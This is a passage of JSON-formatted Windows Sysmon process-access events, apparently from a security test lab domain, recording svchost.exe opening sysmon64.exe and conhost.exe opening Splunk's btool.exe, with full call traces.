C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 